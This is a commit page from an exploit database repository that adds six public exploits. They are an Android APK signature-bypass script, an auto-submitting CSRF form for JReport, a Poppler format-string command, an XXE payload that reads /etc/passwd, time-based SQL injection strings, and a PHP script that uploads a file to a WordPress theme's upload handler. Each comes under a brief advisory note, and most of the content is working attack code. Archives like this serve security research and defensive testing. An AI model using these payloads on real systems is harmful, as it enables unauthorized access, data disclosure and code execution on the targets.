Skip to content

Commit f25ba13

Browse files
author
Offensive Security
committed
DB: 2015-11-28
6 new exploits
1 parent 672c4d0 commit f25ba13

7 files changed

Lines changed: 144 additions & 0 deletions

File tree

files.csv

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -35086,3 +35086,9 @@ id,file,description,date,author,platform,type,port
3508635086
38813,platforms/multiple/remote/38813.txt,"Apache Shindig XML External Entity Information Disclosure Vulnerability",2013-10-21,"Kousuke Ebihara",multiple,remote,0
3508735087
38814,platforms/php/webapps/38814.php,"Joomla! Maian15 Component 'name' Parameter Arbitrary Shell Upload Vulnerability",2013-10-20,SultanHaikal,php,webapps,0
3508835088
38815,platforms/lin_x86-64/shellcode/38815.c,"Linux x86_64 Polymorphic execve Shellcode - 31 bytes",2015-11-25,d4sh&r,lin_x86-64,shellcode,0
35089+
38816,platforms/jsp/webapps/38816.html,"JReport 'dealSchedules.jsp' Cross-Site Request Forgery Vulnerability",2013-10-25,"Poonam Singh",jsp,webapps,0
35090+
38817,platforms/linux/local/38817.txt,"Poppler <= 0.14.3 '/utils/pdfseparate.cc' Local Format String Vulnerability",2013-10-26,"Daniel Kahn Gillmor",linux,local,0
35091+
38818,platforms/multiple/remote/38818.xml,"Openbravo ERP CVE-2013-3617 XML External Entity Information Disclosure Vulnerability",2013-10-30,"Tod Beardsley",multiple,remote,0
35092+
38819,platforms/php/webapps/38819.txt,"Course Registration Management System Cross Site Scripting and SQL Injection Vulnerabilities",2013-10-21,"Omar Kurt",php,webapps,0
35093+
38820,platforms/php/webapps/38820.php,"WordPress This Way Theme 'upload_settings_image.php' Arbitrary File Upload Vulnerability",2013-11-01,Bet0,php,webapps,0
35094+
38821,platforms/android/remote/38821.py,"Google Android Signature Verification Security Bypass Vulnerability",2013-11-04,"Jay Freeman",android,remote,0

platforms/android/remote/38821.py

Lines changed: 44 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,44 @@
1+
source: http://www.securityfocus.com/bid/63547/info
2+
3+
Google Android is prone to a security-bypass vulnerability.
4+
5+
Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions. This may aid in further attacks.
6+
7+
Android 4.4 is vulnerable; other versions may also be affected.
8+
9+
#!/usr/bin/python
10+
11+
import zipfile
12+
import struct
13+
import sys
14+
15+
# usage: ./pocB.py new.apk old.apk file data
16+
zout = zipfile.ZipFile(sys.argv[1], "w")
17+
zin = zipfile.ZipFile(sys.argv[2], "r")
18+
replace = sys.argv[3]
19+
new = open(sys.argv[4], 'r').read()
20+
21+
fp = zout.fp
22+
23+
for name in zin.namelist():
24+
old = zin.read(name)
25+
if name != replace:
26+
zout.writestr(name, old, zipfile.ZIP_DEFLATED)
27+
else:
28+
assert len(new) <= len(old)
29+
30+
# write header, old data, and record offset
31+
zout.writestr(name, old, zipfile.ZIP_STORED)
32+
offset = fp.tell()
33+
34+
# return to name length, set to skip old data
35+
fp.seek(-len(old) -len(name) -4, 1)
36+
fp.write(struct.pack('<h', len(name) + len(old)))
37+
38+
# after old data, write new data \0 padded
39+
fp.seek(offset)
40+
fp.write(new)
41+
fp.write('\0' * (len(old) - len(new)))
42+
43+
zout.close()
44+
zin.close()

platforms/jsp/webapps/38816.html

Lines changed: 20 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,20 @@
1+
source: http://www.securityfocus.com/bid/63363/info
2+
3+
JReport is prone to a cross-site request-forgery vulnerability.
4+
5+
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
6+
7+
<html>
8+
<body>
9+
<form name="foo" action="https://www.example.com/jreport/jinfonet/dealSchedules.jsp"method="post">
10+
<input type=hidden name="d1" value="2013-08-03%252014%253a20%253a41.29">
11+
<input type=hidden name="cmd" value="cmd_delete_schedules">
12+
<input type=hidden name="taskClass" value="APIDemoDynamicExportTask">
13+
<input type=hidden name="taskUrl" value="schedulePage.jsp%3Fjrs.cmd%3Djrs.get_edit_schd_page%26jrs.task_id%3D2013-08-03%252014%253a20%253a41.29%26jrs.catalog%3D%252fSecurity%252fSecurity.cat%26jrs.report%3D%252fSecurity%252fBank_User%2520Activation.cls%26jrs.path%3D%2FUSERFOLDERPATH%2Fadmin">
14+
<input type=hidden name="jrs.path" value="%2FUSERFOLDERPATH%2Fadmin">
15+
</form>
16+
<script>
17+
document.foo.submit();
18+
</script>
19+
</body>
20+
</html>

platforms/linux/local/38817.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/63374/info
2+
3+
Poppler is prone to a local format-string vulnerability because it fails to sanitize user-supplied input.
4+
5+
An attacker may exploit this issue to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely result in a denial-of-service condition.
6+
7+
Versions prior to Poppler 0.24.3 are vulnerable.
8+
9+
./pdfseparate -f 1 -l 1 aPdfFile.pdf "%x%x%x%x%x%x%n"
Lines changed: 22 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
source: http://www.securityfocus.com/bid/63431/info
2+
3+
Openbravo ERP is prone to an information-disclosure vulnerability.
4+
5+
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
6+
7+
Openbravo ERP 2.5 and 3.0 are vulnerable.
8+
9+
<?xml version="1.0" encoding="UTF-8"?>
10+
<!DOCTYPE foo [
11+
<!ELEMENT comments ANY >
12+
<!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
13+
14+
<ob:Openbravo xmlns:ob="http://www.example.com"
15+
xmlns:xsi="http://www.example1.com/2001/XMLSchema-instance">
16+
<Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Piñ,5L">
17+
<id>C970393BDF6C43E2B030D23482D88EED</id>
18+
<comments>&xxe;</comments>
19+
</Product>
20+
</ob:Openbravo>
21+
22+

platforms/php/webapps/38819.txt

Lines changed: 26 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,26 @@
1+
source: http://www.securityfocus.com/bid/63435/info
2+
3+
Course Registration Management System is prone to multiple cross-site scripting and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
4+
5+
Attackers can exploit these issues to execute arbitrary code in the context of the browser, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; other attacks are also possible.
6+
7+
Course Registration Management System 2.2.1 is vulnerable; other versions may also be affected.
8+
9+
10+
http://example.com/add_user.php (POST - params: work_tel, lastname, email, gmc_reg, job_title, firstname)
11+
12+
http://example.com/login.php (POST - params: username)
13+
14+
http://example.com/auth.php (POST - params: username)
15+
16+
http://example.com/forgotten_password.php
17+
(POST - username)
18+
username='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
19+
20+
http://example.com/add_user.php
21+
(POST - email)
22+
email='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
23+
24+
http://example.com/login.php
25+
(POST - username)
26+
username='+(SELECT 1 FROM (SELECT SLEEP(25))A)+

platforms/php/webapps/38820.php

Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
source: http://www.securityfocus.com/bid/63523/info
2+
3+
The This Way Theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
4+
5+
An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible.
6+
7+
<?php
8+
$uploadfile="upl.php";
9+
$ch = curl_init("http://[localcrot]/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php");
10+
curl_setopt($ch, CURLOPT_POST, true);
11+
curl_setopt($ch, CURLOPT_POSTFIELDS,
12+
array('Filedata'=>"@$uploadfile"));
13+
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
14+
$postResult = curl_exec($ch);
15+
curl_close($ch);
16+
print "$postResult";
17+
?>

0 commit comments

Comments
 (0)